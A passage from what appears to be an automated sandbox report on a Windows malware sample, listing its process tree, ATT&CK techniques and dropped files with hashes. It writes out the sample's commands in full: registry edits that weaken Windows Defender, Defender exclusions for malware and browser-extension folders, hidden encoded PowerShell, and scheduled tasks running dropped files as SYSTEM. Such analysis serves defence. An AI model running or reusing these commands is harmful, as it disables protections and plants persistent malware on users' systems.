\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwSxhWLvU" /SC once /ST 08:42:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwSxhWLvU"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwSxhWLvU"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 00:53:59 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\TUhcUgt.exe\" XT /pusite_idapR 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BAnwxolbGpCzXNxkj"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\TUhcUgt.exeC:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\TUhcUgt.exe XT /pusite_idapR 385118 /S1⤵
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWycNackLSywaqkmgR"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\QYDkGF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Modify Registry
7Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify Tools
3Disable or Modify System Firewall
1Virtualization/Sandbox Evasion
1Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
2.0MB
MD5820842fdbf8bde07065f30aa6b951b65
SHA1de5f45df0d2e4124fa861442c32eff883efbdc81
SHA25692f5c3f529ecc871898dea5607da36e2402c5df7e9f8f91a5f058f63f4e5dadf
SHA51239d3352350eba3365de86c67f8bc6b2e66d4376f612869aee43e70d4c4bb18ed53dce14c582b8527f4568899e5d43f22be4db50246b8bf199fa7b6f60fa5377b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD51d7f3d1036cc09d2b9c5d8d5acfbb867
SHA15a76ade3e2ced7d72b6ce450b074d3c5aaa13b85
SHA2560725190ee120338da973024f3d633bd17d0009af194000fa0a91dde961a8d76c
SHA512dc993da2058b91cd4870b0e868963cadd68d0c03aee091691d7ed0a027215ef5114c9d56ec8d9e228cd7d022339d277903fc12481e2e00df758a3915a17d1fd8
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057141\additional_file0.tmpFilesize
2.5MB
MD515d8c8f36cef095a67d156969ecdb896
SHA1a1435deb5866cd341c09e56b65cdda33620fcc95
SHA2561521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8
SHA512d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057141\assistant\assistant_installer.exeFilesize
1.9MB
MD5976bc8e5fe65f9bb56831e20f1747150
SHA1f9e7f5628aaaabed9939ef055540e24590a9ccfb
SHA256f53c916ccf3d24d6793227283de2db0f6cc98a2275413851807cc080643d21a0
SHA5122858e7e08418b170b21b599afb02236d0480d35a5605de142f10976489e01daf2ad80df0f09c2eb38bc5a971336d1f6aa9909c520bcdb18e9c9a8e903379dcd9
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057141\assistant\dbgcore.DLLFilesize
166KB
MD59ebb919b96f6f94e1be4cdc6913ef629
SHA131e99ac4fba516f82b36bd81784e8d518b32f9df
SHA256fdae21127deb16eb8ba36f2493d2255f4cb8ab4c18e8bd8ba5e587f5a7ecd119
SHA512a1b42f7d2896da270bb3c80cf9b88c4b4f1491084e7aa7760eeea5533b26f041dc79b21d5ffd2bba2221fe118e0a8d912e170f24fd895c9315b1ee9c7adfe700
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057141\assistant\dbghelp.dllFilesize
1.7MB
MD5544255258f9d45b4608ccfd27a4ed1dd
SHA1571e30ceb9c977817b5bbac306366ae59f773497
SHA2563b02fc85602e83059f611c658e3cad6bc59c3c51214d4fe7e31f3ac31388dd68
SHA5122093da881fa90eec2b90d1ca6eaaff608fe16ac612571a7fd5ed94dd5f7ff7e5c1e8c862bab0a228850829527886473e3942abd23a81d10cab8f9baad2cc7664
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057141\opera_packageFilesize
103.8MB
MD55014156e9ffbb75d1a8d5fc09fabdc42
SHA16968d1b5cec3039e53bbbedeee22e2d43d94c771
SHA2567a01e11e1830ba3c154e5a6c383da15938b1e48f89a2fe4045cdd260924b6802
SHA512bfc5c44881d0fa7bcbccfd530d874fa624adec50e1a16063a72de12876d2db10ca5edd6fa841ea63e9deca3ff2adf54065f50719fe051d41de92bb68edba4016
-
C:\Users\Admin\AppData\Local\Temp\7zS6712.tmp\Install.exeFilesize
6.8MB
MD5e77964e011d8880eae95422769249ca4
SHA18e15d7c4b7812a1da6c91738c7178adf0ff3200f
SHA256f200984380d291051fc4b342641cd34e7560cadf4af41b2e02b8778f14418f50
SHA5128feb3dc4432ec0a87416cbc75110d59efaf6504b4de43090fc90286bd37f98fc0a5fb12878bb33ac2f6cd83252e8dfd67dd96871b4a224199c1f595d33d4cade
-
C:\Users\Admin\AppData\Local\Temp\85cf2855Filesize
6.8MB
MD515fe0c4c282df938f0ae415334fc8d11
SHA10b97fa302ed3f3c2b5dbb2dc8f0386e578ebc14d
SHA256ee44025db5ad03b33944bf734f6f256d8b996e89f2ec22197c1767fbae70853d
SHA512fae66f89bc0007d59570a87ef815295a9499299086bbd2418dd17176c814a9ffc4559fc99b9fa2a1ec14e9d18b4206ce406cc483f04691f3a644cb6a84f932b5
-
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2404231057135485904.dllFilesize
4.6MB
MD50415cb7be0361a74a039d5f31e72fa65
SHA146ae154436c8c059ee75cbc6a18ccda96bb2021d
SHA256bb38a8806705980ee3e9181c099e8d5c425e6c9505a88e5af538ca6a48951798
SHA512f71c2b9e1559aa4eb2d72f852ef9807c781d4a7b96b8e0c2c53b895885319146bd43aa6e4223d43159f3d40bc60704206404dc034500e47fca0a94e53b60239e
-
C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exeFilesize
8.1MB
MD554d53f5bdb925b3ed005a84b5492447f
SHA1e3f63366d0cc19d48a727abf1954b5fc4e69035a
SHA2564d97e95f172cf1821ec078a6a66d78369b45876abe5e89961e39c5c4e5568d68
SHA512f6a5b88e02e8f4cb45f8aae16a6297d6f0f355a5e5eaf2cbbe7c313009e8778d1a36631122c6d2bcfea4833c2f22dfd488142b6391b9266c32d3205575a8ff72
-
C:\Users\Admin\AppData\Local\Temp\RES3066.tmpFilesize
1KB
MD5de03ebb488a67e9ec4712c08d247ed71
SHA101d6518df6c40f2ed94685a2b6dbe011107a3000
SHA25677f3a7760a56563a43ae5e262a3edadf0e506005e3481c8e93aba41fd553f2b8
SHA5128f032be79791dfd5282729d278e48a43bf44dc1a937b639f720a8dacf475b57464d57835e47b9d7f751c19d3a7455920e52852b49e28bd2005fec181fe7ea6b7
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gl5jhkns.2uk.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
